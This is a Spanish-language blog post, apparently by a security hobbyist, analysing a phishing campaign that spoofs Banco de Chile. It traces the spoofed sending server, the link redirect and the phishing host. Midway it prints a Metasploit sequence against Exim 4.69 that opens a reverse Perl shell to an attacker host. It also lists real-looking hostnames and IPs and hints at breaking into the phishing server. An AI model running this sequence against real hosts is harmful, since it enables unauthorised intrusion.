Hace varios días que
estoy recibiendo en mi casilla SPAM de pramirezh@gmail.com,
una serie de correo electrónicos, el primero me indican en el asunto “Nueva Sincronizacion Por Mantenimiento”, y el
último que me llegó dice “Ultimo aviso de Sincronizacion”, “Notese la falta
ortográfica de los mensajes… como ya se podrán imaginar, es una campaña de
phishing orientada a este banco, la cual me di el tiempo de analizar y ver como
trabaja este o esta organización de phishers.
El origen:
Lo primero que se puede rescatar, es la técnica de suplantación de identidad,
la cual se ve de la siguiente manera en el correo electrónico.
Si se dan cuenta, viene desde el
origen b1.wweb.com.br, al cual si le realizamos un scan de puertos, nos
encontramos con
Como se puede observar, existe el
puerto 25, con el servidor Exim smtpd, versión 4.69, la cual es vulnerable a
ejecución remota de código, y el exploit está disponible en nuestro buen amigo
metasploit, la sentencia de explotación, y la cual tiene que haber seguido el
atacante, para poder enviar correos electrónicos con otra identidad, es la
siguiente:
msf>use
exploit/unix/smtp/exim4_string_format
msf
exploit(exim4_string_format) >set RHOST IP_SERVER_AFECTADO
msf
exploit(exim4_string_format) >set PAYLOAD cmd/unix/reverse_perl
msf
exploit(exim4_string_format) >set LHOST IP_HOST_ATACANTE
msf
exploit(exim4_string_format) >exploit
Todas las opciones del exploit con:
msf
exploit(exim4_string_format) >show options
Como
ya sabemos, desde donde se envió el correo, y como falsificaron la identidad
del banco, nos vamos al cuerpo del mensaje
Cuerpo:
Se
ve algo así en la mayorías de los clientes SMTP:
Si
bien es cierto, en Gmail está el cartel rojo que indica que puede ser un correo
falsificado, en otros sistemas antispam o clientes SMTP no está presente, lo
cual tiene un mayor grado de efectividad.
El
link se ve bastante fidedigno a ojos de usuarios que no tienen mucha
experiencia con este tipo de ataques
(https://www.bancochile.cl/bchile-perfilamiento/), pero que pasa en el código
fuente de este correo:
Claramente el href enviar
al usuario a http://cl2013.sytes.net, este dominio está
alojado en un servicio de www.NO-IP.com, y
esta siendo utilizado para redireccionar a los usuarios a http://207.201.113.192, el cual contiene el aplicativo
de phishing, como lo pueden observamos en la siguiente imagen.
Ahora tratamos de ver que
servicios existen en esa dirección IP y donde está ubicada.
Versión de MySQL no
actualizada ¿? :-p, quizás por ahí toma
el control del sitio para subir la aplicación de phishing… o quizás http://www.cvedetails.com/cve/CVE-2007-1742/
¡!! Esto no es un rooter… solo un análisis de funcionamiento… en otra
oportunidad será J
Ahora la IP, de donde es ¿?
Nada extraño… me hubiese
llamado mucho la atención que estuviera alojado en Chile… le hubiese dedicado
un par de horas más…
Veamos que dice un WAS
Definitivamente es explotable
J
En resumen, después de esta análisis
(bastante básico… y espero que no sea el último y mejorados), el phisher se
movió de host, al parecer tienen que tener algún sistema de monitoreo, IPS o
algo por el estilo, o quizás yo sea el paranoico y simplemente se cambio por
que lo detectaron…
Para la próxima hacemos un
rooter de phishing Chilensis…